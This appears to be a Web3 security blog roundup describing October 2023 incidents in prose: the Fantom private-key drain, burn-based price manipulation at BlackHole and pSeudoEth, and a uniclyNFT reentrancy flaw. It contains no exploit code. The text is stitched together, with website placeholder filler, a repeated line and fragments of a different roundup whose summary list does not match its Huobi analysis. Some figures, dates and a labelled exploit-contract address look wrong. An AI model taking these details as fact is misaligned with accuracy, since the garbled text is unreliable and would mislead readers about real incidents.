Fantom, BlackHole, uniclyNFT: Keys, Burns, and Reentrancy All Over Again
October 2023 saw more déjà vu in Web3 security. A Fantom employee’s hot wallets were drained across chains for $7M. BlackHole and pSeudoEth repeated the burn-to-pump playbook. And uniclyNFT fell to another stale-reward reentrancy bug. These weren’t new attack types — they were unresolved patterns. Each one signals the same thing: most exploits are replays, not revelations.
In Brief
Fantom Foundation lost $7M due to a private key compromise.
BlackHole hacked for over $1.3M.
pSeudoEth got exploited due to price manipulation.
uniclyNFT suffered a reentrancy attack.
Hacks Analysis
Fantom Foundation | Amount Lost: $7M
On October 17th, the Fantom Foundation exploit on multiple chains resulted in a $7 million loss due to the compromise of private keys. The attacker created two malicious contracts and drained wallets 1, 16, 19, and 20 belonging to a Fantom employee on the Ethereum Mainnet, Fantom, and BNB chains. The Fantom Foundation has acknowledged the $7,078,184 hack and clarified that these wallets did not belong to the organization but to a Fantom employee.
On October 11th, the BlackHole exploit on the BNB chain resulted in a $1.3 loss due to a price manipulation vulnerability. The root cause of the exploit was that the attacker was able to burn the BH tokens, reducing the total supply and artificially increasing the token price. The attacker first borrowed 773,800 USDT through flash loans and swapped the funds for BH tokens. The attacker then executed the burn() function and reduced the total BH token supply. The attacker then sold the BH tokens at an artificially inflated price and made a profit.
Press enter or click to view image in full size
Exploit Contract (on BNB Chain): 0x55d398326f99059fF775485246999027B3197955
On October 8th, the pSeudoEth exploit on the Ethereum Mainnet resulted in a $2.3K loss due to a price manipulation vulnerability. The exploit involved initially borrowing 51,970 WETH from Balancer’s Vault and then using these to swap for pEth tokens. The attacker then invoked pSeudoEth’s contract’s 0x387e() function, which included a tax amount that resulted in the burning of pEth tokens. This action reduced the pEth supply, subsequently driving up the token’s price, which the attacker then capitalized on by selling for a profit.
On September 14th, the uniclyNFT exploit on the Ethereum Mainnet resulted in a $2K loss due to a reentrancy attack. The attacker began by depositing 3,528 uJENNY tokens into uniclyNFT’s PointFarm contract to accumulate rewards. Two days later, the attacker exploited the deposit() function, repeatedly minting rewards without settling their debt, as the user.rewardDebt amount was updated only after an external call. The attacker then used the rewards obtained to purchase a LootRealms NFT and subsequently listed it for sale.
The rich text element allows you to create and format headings, paragraphs, blockquotes, images, and video all in one place instead of having to add and format them individually. Just double-click and easily create content.
A rich text element can be used with static or dynamic content. For static content, just drop it into any page and begin editing. For dynamic content, add a rich text field to any collection and then connect a rich text element to that field in the settings panel. Voila!
Headings, paragraphs, blockquotes, figures, images, and figure captions can all be styled after a class is added to the rich text element using the "When inside of" nested selector system.
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
In Brief
Remitano suffered a $2.7M loss due to a private key compromise.
GAMBL’s recommendation system was exploited.
DAppSocial lost $530K due to a logic vulnerability.
Rocketswap’s private keys were inadvertently deployed on the server.
Hacks
Hacks Analysis
Huobi | Amount Lost: $8M
On September 24th, the Huobi Global exploit on the Ethereum Mainnet resulted in a $8 million loss due to the compromise of private keys. The attacker executed the attack in a single transaction by sending 4,999 ETH to a malicious contract. The attacker then created a second malicious contract and transferred 1,001 ETH to this new contract. Huobi has since confirmed that they have identified the attacker and has extended an offer of a 5% white hat bounty reward if the funds are returned to the exchange.
